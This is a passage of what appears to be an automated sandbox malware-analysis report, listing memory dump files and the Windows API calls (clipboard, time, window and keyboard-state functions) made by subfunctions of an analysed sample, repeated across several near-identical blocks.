    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0045A230: SetWindowTextA.USER32(?,?), ref: 0045A6D0
      • Part of subcall function 0045A230: MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045A75C
      • Part of subcall function 0045A230: MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045A786
      • Part of subcall function 0045A230: SetMenu.USER32(?,00000000), ref: 0045A7DE
      • Part of subcall function 0045A230: ShowWindow.USER32(?,00000006), ref: 0045A853
      • Part of subcall function 0045A230: ShowWindow.USER32(?,00000003), ref: 0045A864
      • Part of subcall function 0045A230: ShowWindow.USER32(?,00000009), ref: 0045A875
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0043FF90: GetLastError.KERNEL32 ref: 004401BB
      • Part of subcall function 0043FF90: GetLastError.KERNEL32(?,?,?,?,004987E9,00426F58,?,004987E9,004987E9,?), ref: 00440222
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00435B50: SetWindowTextA.USER32(00000000,?), ref: 00435B65
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040D510
      • Part of subcall function 0040D4E0: GetWindowThreadProcessId.USER32(?,00000000), ref: 0040D5C2
      • Part of subcall function 0040D4E0: AttachThreadInput.USER32(00000E10,00000000,00000001), ref: 0040D5F8
      • Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040D618
      • Part of subcall function 0040D4E0: GetCurrentThreadId.KERNEL32 ref: 0040D64F
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(0000005B), ref: 0040D688
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(0000005C), ref: 0040D696
      • Part of subcall function 0040D4E0: GetForegroundWindow.USER32 ref: 0040D6F2
      • Part of subcall function 0040D4E0: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040D6FF
      • Part of subcall function 0040D4E0: GetKeyboardLayout.USER32(00000000), ref: 0040D708
      • Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040D757
      • Part of subcall function 0040D4E0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040D88C
      • Part of subcall function 0040D4E0: GetProcAddress.KERNEL32(00000000), ref: 0040D893
      • Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040D8E1
      • Part of subcall function 0040D4E0: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040D906
      • Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040D930
      • Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DA37
      • Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DA4B
      • Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DA84
      • Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DB33
      • Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DBA2
      • Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DBBC
      • Part of subcall function 0040D4E0: PostMessageA.USER32(?,00000102,?,00000000), ref: 0040DD0A
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A0), ref: 0040DDA2
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A1), ref: 0040DDB5
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A2), ref: 0040DDC9
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A3), ref: 0040DDDD
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A4), ref: 0040DDF1
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A5), ref: 0040DE05
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(0000005B), ref: 0040DE16
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(0000005C), ref: 0040DE27
      • Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040DEC9
      • Part of subcall function 0040D4E0: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040DEEE
      • Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040DF18
      • Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DF44
      • Part of subcall function 0040D4E0: __Stoull.NTSTC_LIBCMT ref: 0040DFC0
      • Part of subcall function 0040D4E0: PostMessageW.USER32(00000000,00000102,?,00000000), ref: 0040DFF1
      • Part of subcall function 0040D4E0: __itow.LIBCMT ref: 0040E021
      • Part of subcall function 0040D4E0: PostMessageA.USER32(?,00000102,00000000,00000000), ref: 0040E216
      • Part of subcall function 0040D4E0: GetTickCount.KERNEL32 ref: 0040E31E
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A0), ref: 0040E38C
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A1), ref: 0040E39F
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A2), ref: 0040E3B3
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A3), ref: 0040E3C7
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A4), ref: 0040E3DB
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(000000A5), ref: 0040E3EF
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(0000005B), ref: 0040E400
      • Part of subcall function 0040D4E0: GetAsyncKeyState.USER32(0000005C), ref: 0040E411
      • Part of subcall function 0040D4E0: GetKeyState.USER32(00000014), ref: 0040E4B1
      • Part of subcall function 0040D4E0: GetKeyState.USER32(00000014), ref: 0040E4B9
      • Part of subcall function 0040D4E0: GetForegroundWindow.USER32 ref: 0040E4ED
      • Part of subcall function 0040D4E0: GetWindowThreadProcessId.USER32(00000000), ref: 0040E4F4
      • Part of subcall function 0040D4E0: AttachThreadInput.USER32(00000E10,?,00000000), ref: 0040E529
      • Part of subcall function 0040D4E0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040E552
      • Part of subcall function 0040D4E0: GetProcAddress.KERNEL32(00000000), ref: 0040E559
      • Part of subcall function 0040D4E0: GetForegroundWindow.USER32 ref: 0040E57E
      • Part of subcall function 0040D4E0: GetWindowThreadProcessId.USER32(00000000), ref: 0040E585
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0045BAA0: GetWindowRect.USER32(00000000,?), ref: 0045BC1F
      • Part of subcall function 0045BAA0: ScreenToClient.USER32(?,?), ref: 0045BC3E
      • Part of subcall function 0045BAA0: MulDiv.KERNEL32(?,00000060,00000060), ref: 0045BC9F
      • Part of subcall function 0045BAA0: MulDiv.KERNEL32(?,00000060,00000060), ref: 0045BD03
      • Part of subcall function 0045BAA0: MulDiv.KERNEL32(?,00000060,00000060), ref: 0045BD6B
      • Part of subcall function 0045BAA0: MulDiv.KERNEL32(?,00000060,00000060), ref: 0045BDD6
      • Part of subcall function 0045BAA0: IsWindowEnabled.USER32(00000000), ref: 0045BDF5
      • Part of subcall function 0045BAA0: IsWindowVisible.USER32 ref: 0045BE1E
      • Part of subcall function 0045BAA0: GetFocus.USER32 ref: 0045BE5A
      • Part of subcall function 0045BAA0: GetDlgCtrlID.USER32 ref: 0045BE83
      • Part of subcall function 0045BAA0: GetClassNameA.USER32(?,?,000000FC), ref: 0045BEC6
      • Part of subcall function 0045BAA0: EnumChildWindows.USER32(?,00434140,?), ref: 0045BEEC
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0043EE10: _strncpy.LIBCMT ref: 0043EE9A
      • Part of subcall function 0043EE10: __Stoull.NTSTC_LIBCMT ref: 0043EEB5
      • Part of subcall function 0043EE10: GetFileAttributesA.KERNEL32(?), ref: 0043EF08
      • Part of subcall function 0043EE10: _strncpy.LIBCMT ref: 0043EF3D
      • Part of subcall function 0043EE10: _strncpy.LIBCMT ref: 0043EF68
      • Part of subcall function 0043EE10: _strncpy.LIBCMT ref: 0043EF91
      • Part of subcall function 0043EE10: _strncpy.LIBCMT ref: 0043F01E
      • Part of subcall function 0043EE10: _strncpy.LIBCMT ref: 0043F099
      • Part of subcall function 0043EE10: PostMessageA.USER32(000601DA,00000044,00000403,00000000), ref: 0043F22A
      • Part of subcall function 0043EE10: 75B0A2A9.COMDLG32(?), ref: 0043F256
      • Part of subcall function 0043EE10: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop), ref: 0043F295
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00430FC0: _strncpy.LIBCMT ref: 00431067
      • Part of subcall function 00430FC0: _strncpy.LIBCMT ref: 00431089
      • Part of subcall function 00430FC0: Shell_NotifyIcon.SHELL32 ref: 0043109F
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00436750: EnumChildWindows.USER32(00000000,00436960,?), ref: 004367F1
      • Part of subcall function 00436750: EnumChildWindows.USER32(00000000,00436960,00000000), ref: 004368C7
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
